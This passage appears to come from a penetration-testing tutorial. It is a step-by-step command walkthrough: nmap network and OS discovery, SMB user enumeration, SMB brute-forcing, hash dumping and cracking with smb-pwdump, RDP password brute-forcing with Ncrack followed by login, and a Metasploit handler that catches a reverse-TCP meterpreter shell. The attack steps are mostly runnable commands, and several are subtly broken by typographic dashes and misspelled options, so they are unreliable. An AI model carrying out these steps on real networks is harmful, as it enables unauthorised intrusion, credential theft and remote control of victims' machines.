nmap -sP 192.168.101.0/24

Determine the Remote OS Operating System
nmap -O -v -oversiondetect.txt 192.168.101.0/24

OR:
nmap -p445 –script=smb-os-discovery 192.168.101.0/24

Run Users Enumeration (and grep interesting Info):
nmap -p445 –script=smb-enum-users 192.168.101.0/24 | grep -A1 “smb-enum-users”

Run smb-brute.nse with the UserName Obtained by the Previous Command:
nmap -p445 –script=smb-brute –script-args=userdb=usernames.txt 192.168.101.0/24 | grep “^|_”

Perform a PWDUMP if the found User (in this example, “test”) has Access to the password File:
nmap -p445 –script=smb-pwdump –scriptargs=smbuser=test,smbpass=test,rcrack=rcrack,rtable=alpha/*.rt 192.168.101.0/24

The Downloaded Hashes are Saved in a File called “password.txt” and smb-brute.nse is re-run using the Hashes instead of the Default Password File:
cat passwords.txt
nmap -p445 –script=smb-brute –scriptargs=userdb=usernames.txt,passdb=passwords.txt 192.168.101.0/24

Run PWDUMP and Rainbow Crack against 192.168.101.20 with the Credentials of one of the Users, which will Download the Password Database from that System if that user has Sufficient Access:
nmap -p445 –script=smb-pwdump –scriptargs=smbuser=mary,smbhash=ADA65BF48C2CB30AE608489E290618AA,rcrack=rcrack,rtable=alpha/*.rt 192.168.101.20

As the Previous Command Determined the Hash and Cracked the Password of the User “jim”, Test the Login:
ssh [email protected]

5.2 NMAP the Target Network

Run a port scan:
nmap -p80 www.targetcompany.com/24

Scanning for port 80, while not necessarily a guarantee, does help to find all the hosts on the target network that are running Web servers. In addition to the public Web server, there may be staging, development, backup, or internal Web servers that are insecure or offer private information. In addition, port 80 is likely to be open on the firewall because Web traffic generally passes over this port.
Nmap returns the IP address (X.X.X.03) of the target, potentially allowing to scan the related class C address space (X.X.X.x). But first you must verify the class associated with the IP address. A popular method for doing this is to consult the whois service for the domain:
whois targetcompany.com

If you’re unable to identify the class of the network (as was the case here), the entire class C will have to be scanned:
nmap -v -p 80 X.X.X.1-254
nmap -v -p 53 -sU X.X.X.1-254
nmap -v -p 53 -sT X.X.X.1-254
nmap -v -p 25 X.X.X.1-254
nmap -v -p 110 X.X.X.1-254
nmap -v -p 143 X.X.X.1-254
nmap -v -p 139 X.X.X.1-254
nmap -v -p 445 X.X.X.1-254
nmap -v -p 3389 X.X.X.1-254
nmap -v -p 6000 X.X.X.1-254

You don’t specify the protocol in the scan against port 80 (the Hyper-Text Transfer Protocol, or HTTP), because Nmap will default to TCP (Transmission Control Protocol), and there is little reason to scan for UDP (User Datagram Protocol) over this port. In successive scans against port 53 (the DNS port), the protocols UDP and TCP were specified. Over these ports, zone information is exchanged; in other words, the host name–to–IP address mappings for that zone are exchanged between DNS servers and routers. Although the DNS has primarily UDP traffic, it does switch to TCP if the traffic is larger than 512 bytes.
If DNS traffic is allowed through the firewall, a zone transfer might be possible. A zone transfer will be possible if the DNS allows transfers to unauthorized zones; however, many DNSs now block zone transfers except to specifically authorized IP addresses.

Also check ports 25 (SMTP), 110 (POP3), and 143 (IMAP) to identify the presence of eMail servers.

Check for ports 139,445, and 6000 are an effort to identify the operating system of the target. Ports 139 and 445 are typical Windows ports (for NT and 2000/XP, respectively), and port 6000 is a typical UNIX port (the X11 service). Identifying the target’s operating system is a large step in the direction of compromising the target because potential avenues of attack and known vulnerabilities can be explored.

To identify the operating system you can also run an nmap OS detection scan:
nmap -O -v -oversiondetect.txt X.X.X.1-254

Once you had identified port 25 (SMTP) as being open, attempt to identify the version of the application by making a Telnet connection to the port:
telnet target_IP_address 25

You can also tun netcat to grab application/service banner:
nc www.targethost.com 25

The banner presented during the connection process will generally reveal all the information necessary. There are many applications for capturing application banners, including the freeware tools netcat, MingSweeper and Fport for Windows, BannerGrab and various banner grabbers at packetstormsecurity.org.

5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack

The Remote Desktop Protocol could be a possible way to break into a system during a penetration test.

Use Nmap to scan again the target network to check the hosts up and running and to put the in the specified ouput file only the IP address extracted from the results:
nmap -sP X.X.X.1-254 | grep -Eo ‘([0-9]{1,3}\.){3}[0-9]{1,3}’ >> hosts_list.txt

Run a Nmap fast scan on the active hosts by using as target the hosts list generated by the previous command:
nmap -F –iL hosts_list.txt

We can also run additional scans as cross-checks to search for open RDP ports on the network and on active servers:
nmap -p 3389 X.X.X.1-254
nmap –v -F –iL hosts_list.txt -p 3389

Once we found Microsoft Terminal Services (ms-term-serv) running, we need to compile a list of valid usernames to brute-force the passwords in the following steps.
We can use some usernames wordlists such as those you can download from these sites:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
or we can make use of social engineering to find the names of IT staff people for example on LinkedIn or on Facebook to guess the username based on the naming convention of the Company or based on the eMail addresses or, again, we can use Nmap to identify a SMB server in the target network:
nmap -v -p445 X.X.X.1-254
nmap -v –p U:137,T:139 X.X.X.1-254
nmap -sS -O X.X.X.1-254 -p 139,445

then to identify the SMB server informations by using the smb-os-discovery.nse NSE script:
nmap –script smb-os-discovery.nse -p445 X.X.X.1-254
nmap -sU -sS –script smb-os-discovery.nse -p U:137,T:139 X.X.X.1-254
nmblookup -A 192.168.0.5
smbclient //servername-dt/share -I <host> -N

and then to enumerate Windows users through SMB by using the smb-enum-users.nse NSE script:
nmap –script smb-enum-users.nse -p445 <host>
nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139 <host>

So, in the end, let’s assume we have a users.txt text file with such kind of content:
dfreeman
jsmith
bhawkins
dscott
tscott
sstevens
test
klewis
bwilkinson

We also need a wordlist.txt file containing a list of passwords one per line (as for the users.txt file): you can download password dictionaries and wordlists files from the links listed above.

Download the latest Ncrack version for your operating system and install it.
You can install binaries or you can compile it from sources on a Linux OS.
If you want to compile it from sources, then download the .tgz file from the above link, create the /usr/local/share/ncrack directory, move the compressed tarball into the directory, decompress it, access the subdirectory created by the tarball decompression, configure, compile and install Ncrack:

mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Run Ncrack against the Terminal Server hosts (one at time) by passing to it the users.txt file and the wordlist.txt file (change the target IP address according to your environment):
ncrack -vv -U users.txt -P wordlist.txt 192.168.56.10:3389,CL=1

The Ncrack output will show wether the usernames are valid and which of them, and it will also show that we can crack the login credentials as the passwords for these users are weak.
We can also see in the output which user has restrictions on the host and which has more privileges (such as the permission to interactive logon the server).
So, by using the credentials of the users having the right to logon the server, we try to access the host: to do this we use a Remote Desktop Client – on Windows we can use the Microsoft Remote Desktop Connection client, on Linux Terminal Server Client, Rdesktop, Remmina (my favourite for the number of protocols supported and the features available) or PAC Manager, on Solaris Rdesktop, on Mac the Microsoft Remote Desktop Connection for Mac, CoRD,

You can start the client and using the GUI by double-clicking its icon or from the command line, for example, by using Microsoft Remote Desktop Connection client on Windows:
%SystemRoot%\System32\mstsc.exe -v 192.168.56.10

OR by using Rdesktop:
rdesktop -d domain -u username -p password -k en-us -a 16 -z -g 1024×768 -5 -P 192.168.56.10

OR by using the default remote desktop client on Mac:
open rdp://jsmith:[email protected]

Once the connection opens up and we logon the host, we’re in.

5.4 Hacking Windows 7 with NMAP and Metasploit

Run a Nmap stealth scan on the target network
nmap -sS -v -PN 192.168.1-255

Start the exploit handler:
use exploit/multi/handler

Set the attacker IP address and port:
set LHOST 192.168.1.1
set LPORT 5555

Set the reverse TCP packet payload:
set payload windows/meterpreter/reverse_tcp

Setup session options:
show options
set EndOnSession false
show options

Specify the target host IP address and port:
set RHOST 192.xx.xx.xx
set RPORT 4321

Check the settings and start exploiting:
show options
exploit